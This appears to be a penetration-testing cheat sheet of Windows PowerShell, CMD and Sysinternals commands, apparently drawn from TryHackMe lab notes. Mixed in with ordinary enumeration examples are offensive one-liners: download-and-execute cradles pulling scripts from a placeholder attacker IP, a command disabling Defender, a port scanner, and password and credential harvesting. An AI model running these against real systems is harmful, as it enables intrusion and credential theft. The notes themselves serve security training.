Useful commands in Powershell, CMD and Sysinternals
Powershell Overview
Cmdlet format:
Verb-Noun
The output of these cmdlets is objects.
Common verbs: Get, Start, Stop, Read, Write, New, Out.
Get-Command
lists all commands.
Get-Command Verb-*
or
Get-Command *-Noun
filters the commands by verb or by noun.
Get-Help Command-Name
will output help on a command.
Object manipulation
|
Pass output from one cmdlet to another. An object contains methods and properties. You can think of methods as functions that can be applied to the output of a cmdlet, and of properties as variables in the output of a cmdlet.
Verb-Noun | Get-Member
outputs the methods and properties of the objects the cmdlet returns.
Example:
Get-Command | Get-Member -MemberType Method
One way of manipulating objects is pulling out the properties from the output of a cmdlet and creating a new object. This is done using the Select-Object cmdlet.
Example:
Get-ChildItem | Select-Object -Property Mode, Name
lists the directories and selects just the mode and the name.
Useful flags (Select-Object)
-First x - gets the first x objects
-Last x - gets the last x objects
-Unique - shows only the unique objects
-Skip x - skips the first x objects
Filtering objects
Verb-Noun | Where-Object -Property PropertyName -operator Value
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
uses the $_ variable to refer to each object passed to the Where-Object cmdlet in turn.
Operators:
-Contains
if any item in the property value is an exact match for the specified value
-EQ
if the property value is the same as the specified value
-GT
if the property value is greater than the specified value
The full list of operators is in the PowerShell help topic about_Comparison_Operators (Get-Help about_Comparison_Operators).
Example:
Get-Service | Where-Object -Property Status -eq Stopped
lists the stopped services.
Sort objects
Verb-Noun | Sort-Object
Example:
Get-ChildItem | Sort-Object
sorting the list of directories
Source: TryHackMe - Throwback
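The cmdlets above combined in one pipeline, as an added example that is not part of the original notes. It assumes Windows PowerShell 5.0 or later (for the StartType property of service objects) and makes no assumption about which services exist on the host.

```powershell
# Added example, not from the original page: Get-Member, Where-Object,
# Select-Object and Sort-Object chained on real service objects.
# Assumes Windows PowerShell 5.0+ (StartType property).

# 1. Inspect the object type first: which properties can we filter and select on?
Get-Service | Get-Member -MemberType Property | Select-Object -Property Name

# 2. Filter with Where-Object. $_ is the current object; -and joins two tests.
#    Services set to start automatically but currently stopped are worth a
#    second look when reviewing a host.
$stoppedAuto = Get-Service |
    Where-Object { $_.Status -eq 'Stopped' -and $_.StartType -eq 'Automatic' } |
    Select-Object -Property Name, DisplayName, StartType |
    Sort-Object -Property Name

$stoppedAuto | Format-Table -AutoSize

# 3. Select-Object can also build a calculated property: here the number of
#    services that depend on each service, most depended-on first.
Get-Service |
    Select-Object -Property Name, Status,
        @{ Name = 'Dependents'; Expression = { $_.DependentServices.Count } } |
    Sort-Object -Property Dependents -Descending |
    Select-Object -First 5 |
    Format-Table -AutoSize
```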
Downloading files
certutil.exe -urlcache -f http://IP-OF-YOUR-WEBSERVER-WHERE-FILES-ARE-HOSTED/file-you-need name-you-want-to-give-the-file
(works also in cmd)
wget http://IP-OF-YOUR-WEBSERVER-WHERE-FILES-ARE-HOSTED/file-you-need -OutFile name-you-want-to-give-the-file
(in Windows PowerShell, wget is an alias of Invoke-WebRequest)
iex (New-Object Net.WebClient).DownloadString('http://IP-OF-YOUR-WEBSERVER-WHERE-FILES-ARE-HOSTED/file-you-need')
will load the script in memory without writing it to disk; if we use it to load PowerView, for instance, we will then be able to run PowerView commands.
Offensive Powershell
Disable AV
Set-MpPreference -DisableRealtimeMonitoring $true
disables Defender real-time monitoring. Needs local admin rights, is blocked when Tamper Protection is enabled, and is logged as event ID 5001 in the Microsoft-Windows-Windows Defender/Operational log.
Using modules
Import-Module Module
. .\Module.ps1
Enumeration
For manual enumeration with powershell check out my article here
Powershell Remoting
Enter-PSSession -ComputerName workstation-01
Enter-PSSession -ComputerName workstation-01 -Credential domain\Username
Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName workstation-01 -Credential domain\Username
connect to a remote powershell and execute commands with ScriptBlock. Other commands we could run in the script block: ipconfig, net user, ...
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
List AppLocker rules
Misc
Install-Module ActiveDirectoryModule -Scope CurrentUser
Install a module without admin rights
Get-MpComputerStatus
Check Windows Defender status
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -Path C:\Windows\System32\cmd.exe -User Everyone
Test AppLocker policy
Get-HotFix | ft -AutoSize
display hotfixes
Get-WmiObject -Class Win32_Product | select Name, Version
display installed software (slow: the Win32_Product class runs an MSI consistency check on every package)
gci \\.\pipe\
list named pipes (gci is an alias of Get-ChildItem)
select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password
Search file contents
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
search for file extensions
View Sticky Notes data
Enumerate scheduled tasks with Get-ScheduledTask
Get-ScheduledTask | select TaskName,State
Get-LocalUser
check the description field of local users
Get-WmiObject -Class Win32_OperatingSystem | select Description
Print the computer description field
DOS CMD
Downloading files
certutil.exe -urlcache -f http://IP-OF-YOUR-WEBSERVER-WHERE-FILES-ARE-HOSTED/file-you-need name-you-want-to-give-the-file
curl.exe -o name-you-want-to-give-the-file http://IP-OF-YOUR-WEBSERVER-WHERE-FILES-ARE-HOSTED/file-you-need
Encode and Decode files
certutil -encode file1 encodedfile
certutil -decode encodedfile file2
System Enumeration
If we want to grep for specific information we can use
findstr
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
If we want to see patches and updates
wmic qfe
wmic qfe get Caption,Description,HotFixID,InstalledOn
List the drives
wmic logicaldisk
schtasks
query scheduled tasks
schtasks /query /fo LIST /v
driverquery
will list installed drivers
tasklist /svc
get the list of running processes and the services hosted in each
set
display all environment variables
wmic product get name
display installed software
icacls c:\Windows\System32\config\SAM
check permissions on the SAM file
[environment]::OSVersion.Version
check OS version (PowerShell syntax; from cmd use ver)
cmd /c echo %PATH%
review the PATH variable
User Enumeration
whoami
will give info on the current user
whoami /priv
will give info on the current user's privileges
whoami /groups
will give info on the groups the current user is in
net user
or
net users
will list the users on the machine
query user
logged in users
echo %USERNAME%
current user
net user username
will list info about the user with the username mentioned
net localgroup
net localgroup groupname
will give info on the group
qwinsta
or
query session
other users logged in simultaneously
net accounts
Get password policy & other account information
Network Enumeration
ipconfig
or
ipconfig /all
arp -a
route print
netstat -ano
list active connections
-a : displays all active connections and listening ports on the target system.
-n : prevents name resolution. IP addresses and ports are displayed as numbers instead of attempting to resolve names using DNS.
-o : displays the process ID using each listed connection.
Any port listed as "LISTENING" that was not discovered with the external port scan can present a potential local service. This is when we might need to use port forwarding to investigate the service.
Check what service runs on a specific port (in the example we will use 8080)
Scan ports
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "Port $_ is open!"} 2>$null
scan some ports on a specific IP
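Tying every listening port to its owning process and service, which is what the "check what service runs on a specific port" step above needs; this is an added example, not part of the original notes. It uses Get-NetTCPConnection where the NetTCPIP module exists (Windows 8 / Server 2012 and later) and otherwise parses the text output of netstat -ano; the function name is made up here.

```powershell
# Added example, not from the original page. Get-ListeningPortOwners is a
# hypothetical helper name; it maps listening TCP ports to PID, process and
# Windows service so a port seen (or missed) by an external scan can be explained.
function Get-ListeningPortOwners {
    if (Get-Command Get-NetTCPConnection -ErrorAction SilentlyContinue) {
        Get-NetTCPConnection -State Listen |
            Select-Object -Property LocalAddress, LocalPort, OwningProcess,
                @{ Name = 'Process'; Expression = {
                    (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName } },
                @{ Name = 'Service'; Expression = {
                    (Get-CimInstance Win32_Service -Filter "ProcessId = $($_.OwningProcess)").Name -join ',' } } |
            Sort-Object -Property LocalPort
    }
    else {
        # Fallback for older hosts: parse netstat -ano.
        # Columns: Proto, Local Address, Foreign Address, State, PID.
        netstat -ano | Select-String -Pattern 'LISTENING' | ForEach-Object {
            $f = ($_.Line -split '\s+') | Where-Object { $_ }   # drop empty leading field
            [PSCustomObject]@{
                LocalAddress  = ($f[1] -replace ':\d+$', '')     # handles [::]:135 as well
                LocalPort     = [int](($f[1] -split ':')[-1])
                OwningProcess = [int]$f[4]
                Process       = (Get-Process -Id $f[4] -ErrorAction SilentlyContinue).ProcessName
                Service       = (Get-CimInstance Win32_Service -Filter "ProcessId = $($f[4])").Name -join ','
            }
        } | Sort-Object -Property LocalPort
    }
}

# Which process is behind port 8080 (the port used in the text above)?
Get-ListeningPortOwners | Where-Object { $_.LocalPort -eq 8080 }

# Everything that listens locally; compare against the external scan result.
Get-ListeningPortOwners | Format-Table -AutoSize
```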
Hunting passwords
findstr /si password *.txt
will search for the string "password" in txt files
/si
means it searches in the current directory and all subdirectories (s) and ignores the case (i).
findstr /si password *.txt *.ini *.config *.sql
same but also in ini, sql and config files
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
Search file contents for a string (/M prints only the file names)
findstr /spin "password" *.*
another way
Unattend.xml files might have passwords in plaintext or base64 encoded
C:\Users\username\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
powershell command history is also worth looking at. To check where it is we can use this command
(Get-PSReadLineOption).HistorySavePath
We can try to read it
gc (Get-PSReadLineOption).HistorySavePath
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
Retrieve the contents of all Powershell history files that we can access as our current user
Powershell credentials exported with Export-Clixml are protected with DPAPI, which binds them to the user and machine that created them. If we can read such a file as that user we can recover the credential in cleartext
$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
$credential.GetNetworkCredential().username
$credential.GetNetworkCredential().password
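A round trip that shows what the DPAPI protection on an exported credential does and does not cover, as an added example that is not part of the original notes. The file path under $env:TEMP and the sample account and password are constructed for the demonstration.

```powershell
# Added example, not from the original page. Builds a credential in memory,
# exports it the way scripts usually do, and reads it back.
$path = Join-Path $env:TEMP 'demo-cred.xml'   # constructed path for the demo

# Constructed sample account and password; nothing is read from the real system.
$secure = ConvertTo-SecureString 'Sample-Passw0rd!' -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential -ArgumentList 'demo\svc_account', $secure
$cred | Export-Clixml -Path $path

# On disk the password is not plaintext: the <SS> element is a DPAPI blob
# encrypted with a key derived from the exporting user's logon on this machine.
Select-String -Path $path -Pattern '<SS' | Select-Object -First 1

# The same user on the same machine gets it back with no extra key, which is
# why readable credential files (weak ACLs, shared folders) matter for defenders.
$restored = Import-Clixml -Path $path
$restored.GetNetworkCredential().Domain     # demo
$restored.GetNetworkCredential().UserName   # svc_account
$restored.GetNetworkCredential().Password   # Sample-Passw0rd!

# Any other account, or a copy of the file moved to another machine, fails at
# Import-Clixml with "Key not valid for use in specified state".
Remove-Item -Path $path
```

Auditing for such files means checking who can read them (icacls on the file), not whether the password is visible in the XML.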
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
search for file extensions
where /R C:\ *.config
another way
C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
Looking for passwords in Sticky Notes
strings plum.sqlite-wal
Using strings to view the DB file contents
Other files worth checking
cmdkey /list
list saved credentials
runas /savecred /user:domain\user "COMMAND HERE"
run a command as another user
AV Enumeration
sc query windefend
will show if Defender is running
sc queryex type= service
will list all running services
netsh advfirewall firewall dump
check the firewall
netsh firewall show state
similar older command
netsh firewall show config
will show the config of the firewall, useful to see blocked ports and other settings
Execute dll files
We can use Rundll32
Execute powershell file
Sometimes powershell won't launch so we will have to use cmd. It is possible to execute a ps1 script using this trick.
We take the necessary script on our attacking machine
python3 -m http.server 80
we serve it to our target with an http server
echo IEX(New-Object Net.WebClient).DownloadString('http://ATTACK-MACHINE-IP/script.ps1') | powershell -noprofile -
we can use this command to download and execute it on our target.
powershell -file file.ps1
Sysinternals
Pipelist
Pipelist is useful to enumerate instances of named pipes
pipelist.exe /accepteula
enumerate instances of named pipes.
Accesschk
Accesschk is useful to enumerate permissions
accesschk.exe /accepteula
accesschk.exe -wuvc Everyone *
list services that Everyone can write to (weak service permissions).
.\accesschk64.exe /accepteula -uwdq "C:\Program Files\"
List users and groups with write privileges on that directory
schtasks
schtasks will let us enumerate scheduled tasks
schtasks /query /fo LIST /v
LOLBAS (living off the land binaries)